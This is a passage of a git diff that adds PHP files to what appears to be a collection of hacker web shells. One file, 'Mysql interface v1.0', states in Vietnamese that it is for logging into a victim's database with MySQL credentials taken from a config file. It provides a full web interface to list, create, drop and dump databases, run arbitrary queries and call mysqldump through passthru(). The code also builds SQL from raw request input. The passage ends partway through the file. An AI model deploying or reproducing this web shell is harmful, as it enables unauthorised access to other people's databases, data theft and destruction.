+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE 
+$key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len 
+name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname 
+value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD 
+$dbname 
+$tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a 
+href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table 
+List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
diff --git a/xakep-shells/PHP/Mysql interface v1.0.php.txt b/xakep-shells/PHP/Mysql interface v1.0.php.txt
new file mode 100644
index 0000000..28a5e14
--- /dev/null
+++ b/xakep-shells/PHP/Mysql interface v1.0.php.txt	
@@ -0,0 +1,1166 @@
+<?
+/*
+* Mysql interface v1.0
+* -------------------------------
+* Description :
+* Dung` de login vao` CSDL cua victim khi da biet user va` pass cua mysql thong qua file config
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+global $PHP_SELF;
+
+setcookie( "mysql_web_admin_username" );
+setcookie( "mysql_web_admin_password" );
+echo "<html>\n";
+echo "<head>\n";
+echo "<title>Mysql interface</title>\n";
+echo "</head>\n";
+echo "<body>\n";
+echo "<table width=100% height=100%><tr><td><center>\n";
+echo "<table cellpadding=2><tr><td bgcolor=#0090FF><center>\n";
+echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+echo "<h1><b><font color=#FF0000>Mysql Interface v1.0</font></b></h1>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=logon_submit>\n";
+echo "<table cellpadding=5 cellspacing=1>\n";
+echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+echo "</table><p>\n";
+echo "<input type=submit value='Enter'>\n";
+echo "<input type=reset value='Clear'><br>\n";
+echo "</form>\n";
+echo "</center></td></tr></table>\n";
+echo "</center></td></tr></table>\n";
+echo "<p><hr width=300>\n";
+echo "<font size=2>\n";
+echo "Copyright &copy; 2005\n <br>";
+echo "</font>\n";
+echo "</center></td></tr></table>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+function logon_submit() {
+global $username, $password, $PHP_SELF;
+
+setcookie( "mysql_web_admin_username", $username );
+setcookie( "mysql_web_admin_password", $password );
+echo "<html>";
+echo "<head>";
+echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+echo "</head>";
+echo "</html>";
+}
+
+function echoQueryResult() {
+global $queryStr, $errMsg;
+
+if( $errMsg == "" ) $errMsg = "Success";
+if( $queryStr != "" ) {
+  echo "<table cellpadding=5>\n";
+  echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+  echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+  echo "</table><p>\n";
+}
+}
+
+function listDatabases() {
+global $mysqlHandle, $PHP_SELF;
+
+echo "<h1>Database List</h1>\n";
+
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createDB>\n";
+echo "<input type=text name=dbname>\n";
+echo "<input type=submit value='Create Database'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+$pDB = mysql_list_dbs( $mysqlHandle );
+$num = mysql_num_rows( $pDB );
+for( $i = 0; $i < $num; $i++ ) {
+  $dbname = mysql_dbname( $pDB, $i );
+  echo "<tr>\n";
+  echo "<td>$dbname</td>\n";
+  echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function createDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_create_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function dropDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_drop_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function listTables() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+echo "<h1>Table List</h1>\n";
+echo "<p class=location>$dbname</p>\n";
+echoQueryResult();
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createTable>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text name=tablename>\n";
+echo "<input type=submit value='Create Table'>\n";
+echo "</form>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=query>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text size=40 name=queryStr>\n";
+//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+echo "<input type=submit value='Query'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+$pTable = mysql_list_tables( $dbname );
+
+if( $pTable == 0 ) {
+  $msg  = mysql_error();
+  echo "<h3>Error : $msg</h3><p>\n";
+  return;
+}
+$num = mysql_num_rows( $pTable );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $tablename = mysql_tablename( $pTable, $i );
+
+  echo "<tr>\n";
+  echo "<td>\n";
+  echo "$tablename\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+  echo "</td>\n";
+  echo "<td>\n";
+  echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+  echo "</td>\n";
+  echo "</tr>\n";
+}
+
+echo "</table>";
+}
+
+function createTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "CREATE TABLE $tablename ( no INT )";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function dropTable() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "DROP TABLE $tablename";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+listTables();
+}
+
+function viewSchema() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+echo "<h1>Table Schema</h1>\n";
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echoQueryResult();
+
+echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+echo "<hr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+echo "<tr>\n";
+echo "<th>Field</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Null</th>\n";
+echo "<th>Key</th>\n";
+echo "<th>Default</th>\n";
+echo "<th>Extra</th>\n";
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  echo "<tr>\n";
+  echo "<td>".$field["Field"]."</td>\n";
+  echo "<td>".$field["Type"]."</td>\n";
+  echo "<td>".$field["Null"]."</td>\n";
+  echo "<td>".$field["Key"]."</td>\n";
+  echo "<td>".$field["Default"]."</td>\n";
+  echo "<td>".$field["Extra"]."</td>\n";
+  $fieldname = $field["Field"];
+  echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Field</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Field</h1>\n";
+  $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+  $num = mysql_num_rows( $pResult );
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  if( $field["Field"] == $fieldname ) {
+    $fieldtype = $field["Type"];
+    $fieldkey = $field["Key"];
+    $fieldextra = $field["Extra"];
+    $fieldnull = $field["Null"];
+    $fielddefault = $field["Default"];
+    break;
+  }
+  }
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( strpos( $fieldtype, "(" ) ) {
+  if( $type == "enum" | $type == "set" ) {
+    $valuelist = strtok( " ()\n" );
+  } else {
+    $M = strtok( " (,)\n" );
+    if( strpos( $fieldtype, "," ) )
+    $D = strtok( " (,)\n" );
+  }
+  }
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+echo "<form action=$PHP_SELF>\n";
+
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addField_submit>\n";
+else if( $cmd == "edit" ) {
+  echo "<input type=hidden name=action value=editField_submit>\n";
+  echo "<input type=hidden name=old_name value=$fieldname>\n";
+}
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+
+echo "<h3>Name</h3>\n";
+echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
